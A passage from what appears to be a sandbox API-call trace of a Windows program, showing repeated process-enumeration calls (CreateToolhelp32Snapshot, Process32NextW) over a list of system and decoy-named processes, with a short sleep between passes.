hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0108.073] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, 
cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0108.074] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0108.075] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0108.077] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0108.078] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0108.079] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0108.081] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0108.082] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, 
th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.084] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0108.085] CloseHandle (hObject=0xc4) returned 1 [0108.085] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0108.091] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0108.092] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0108.093] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0108.093] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0108.094] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0108.095] 
Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0108.096] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0108.096] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0108.097] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0108.098] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0108.099] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.099] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.100] Process32NextW 
(in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.101] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.102] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.105] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0108.106] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.106] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.107] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0108.108] Process32NextW (in: 
hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.109] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0108.111] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0108.112] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0108.113] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0108.114] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.116] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0108.117] Process32NextW (in: 
hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0108.118] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0108.120] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0108.121] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0108.122] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0108.123] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0108.124] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="motors.exe")) returned 1 [0108.125] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0108.127] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0108.128] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0108.129] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0108.130] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0108.131] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0108.132] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, 
dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0108.133] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0108.135] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0108.136] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0108.137] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0108.138] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0108.139] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0108.140] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, 
th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.141] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0108.142] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0108.143] CloseHandle (hObject=0xbc) returned 1 [0108.143] Sleep (dwMilliseconds=0x12c) [0108.519] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0108.525] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0108.525] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0108.526] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0108.527] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0108.527] Process32NextW (in: 
hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0108.528] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0108.529] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0108.529] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0108.530] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0108.530] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0108.531] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.532] Process32NextW (in: 
hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.532] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.533] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.534] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.534] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0108.535] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.536] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.536] Process32NextW (in: 
hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0108.537] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0108.539] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0108.540] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0108.541] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, 